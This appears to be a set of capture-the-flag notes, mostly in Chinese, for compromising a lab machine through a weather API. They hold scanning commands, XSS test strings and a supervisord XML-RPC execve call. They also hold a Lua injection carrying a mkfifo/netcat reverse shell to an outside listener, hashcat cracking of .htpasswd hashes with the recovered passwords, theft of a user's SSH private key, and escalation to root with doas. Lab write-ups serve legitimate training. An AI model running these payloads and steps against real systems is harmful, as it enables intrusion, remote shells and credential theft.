nmap -sTVC 10.129.62.59 -Pn
gobuster dir  -u http://10.129.62.59/  -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobuster.txt
gobuster dir  -u http://10.129.133.248/weather -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > weather.txt
gobuster dir  -u http://10.129.133.248/weather -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x txt,php,cgi > weather.txt
gobuster dir  -u http://10.129.133.248/index.html -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > index.txt

http://10.129.133.248

<script>alert(1)</script>
<img src="" onerror>
"}});alert(document.cookie);//



from xmlrpclib import ServerProxy
server = ServerProxy('http://10.129.62.237:9001/RPC2')
server.supervisor.supervisord.options.execve('/bin/sh', [], {})

1.nmap掃描發現有80及9001,打開都需要輸入帳號密碼
2.9001是Medusa服務,根本服務版本上網搜索可以找到默認丈密是user,123
https://linoxide.com/supervisor-monitor-linux-servers-processes/
3.根據medusa使用metasploit但因版本不符合,不生效
use exploit/linux/http/supervisor_xmlrpc_exec
4.80端口有weather的路徑,但打開還是404,使用gobuster做掃描
5.發現有個查詢地區天氣的API,使用fuzz嘗試特殊字符,發現%返回200
wfuzz -c -u http://10.129.134.249/weather/forecast?city=FUZZ  -w /usr/share/wordlists/SecLists/Fuzzing/special-chars.txt
6.嘗試以下指令可以成功執行延遲5秒
');os.execute("sleep 5")--
7.因機器系統是BDF,使用BSD reverse shell指令
');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.50 4444 >/tmp/f")--
8.進入到機器後發現.htpasswd的密碼
9.使用hashcat可以破解出密碼1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest
hashcat -m 500 htpasswd /usr/share/wordlists/rockyou.txt
10.查看本機有監聽3001及3000端口,嘗試使用帳密請請求3001端口,可獲取檔案內容
curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
11.取的ssh私鑰後可ssh登入
12.在backup資料夾發現devel_backup-2020-09-16.tar.gz.enc
13.解壓縮後發現有.htpasswd文件
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz
14.使用hash破解出密碼$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.:littlebear
hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
15.使用doas su 切換root用戶

